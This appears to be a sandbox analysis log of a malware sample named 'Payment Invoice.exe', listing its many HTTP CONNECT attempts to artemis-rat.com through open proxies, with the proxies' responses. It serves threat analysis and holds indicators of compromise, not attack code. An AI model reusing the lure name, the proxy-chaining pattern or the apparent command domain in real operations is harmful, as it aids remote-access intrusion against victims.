                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214783907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:40.214570999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:52.323955059 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:04.324157953 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:16:28.327675104 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                429192.168.2.451286200.97.76.18680807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.179961920 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.517031908 CET203INHTTP/1.0 403 Forbidden
                                                                Content-Length: 1076
                                                                Content-Type: text/html
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Expires: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: Mikrotik HttpProxy
                                                                Proxy-Connection: close


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                430192.168.2.4507735.161.219.1342287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.180010080 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.396298885 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                431192.168.2.451382104.27.66.31807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.180068016 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.334209919 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                432192.168.2.451384172.67.182.77807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.180110931 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.334460020 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                433192.168.2.45073872.210.221.22341457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.180205107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                434192.168.2.45145943.153.174.1974437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.184025049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                435192.168.2.45146843.153.174.1974437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.187817097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                436192.168.2.45146943.153.174.1974437076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.188864946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                437192.168.2.451405104.18.136.28807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.196854115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.350955009 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                438192.168.2.450722176.58.96.1131287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.196898937 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.214428902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:22.215353966 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:28.214759111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                439192.168.2.4513583.21.101.15831287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.196996927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.415616989 CET116INHTTP/1.1 200 OK
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Server: nginx
                                                                Content-Type: text/plain
                                                                Content-Length: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                440192.168.2.45074172.195.34.4141457076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.199821949 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                441192.168.2.451310206.42.27.11380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.201843977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.677867889 CET19INHTTP/1.1 200 OK


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                442192.168.2.451380209.121.164.50311477076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.208302975 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886043072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:18.213825941 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                443192.168.2.450632185.191.236.16231287076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.211158991 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.356228113 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.888972044 CET39INHTTP/1.1 200 Connection established


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                444192.168.2.450707193.8.87.4344447076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.229881048 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                445192.168.2.450537120.197.40.21990027076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.236068010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.356403112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.969412088 CET311INHTTP/1.1 400 Bad Request
                                                                Server: nginx
                                                                Date: Mon, 11 Mar 2024 15:15:19 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 166
                                                                Connection: close
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                446192.168.2.450676216.10.242.18405717076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.247781992 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                447192.168.2.45139551.161.33.206445237076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.250349998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.886209011 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:17.625188112 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:19.054233074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:21.757258892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:24.386943102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:27.048536062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:32.341461897 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:42.886218071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                448192.168.2.451347185.212.60.62807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.255654097 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                449192.168.2.45133314.232.235.1380807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.261943102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.749619007 CET72INHTTP/1.1 200 Connection established
                                                                Proxy-Agent: Fortinet-Proxy/1.0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                450192.168.2.451420104.16.105.146807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.265645981 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.420429945 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                451192.168.2.451328119.91.214.11933897076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.267353058 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                452192.168.2.451425104.18.237.128807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.273055077 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.427489996 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                453192.168.2.451428104.16.105.207807076C:\Users\user\Desktop\Payment Invoice.exe
                                                                TimestampBytes transferredDirectionData
                                                                Mar 11, 2024 16:15:16.278037071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                Host: artemis-rat.com
                                                                Proxy-Connection: Keep-Alive
                                                                Mar 11, 2024 16:15:16.432056904 CET316INHTTP/1.1 400 Bad Request
                                                                Server: cloudflare
                                                                Date: Mon, 11 Mar 2024 15:15:16 GMT
                                                                Content-Type: text/html
                                                                Content-Length: 155
                                                                Connection: close
                                                                CF-RAY: -
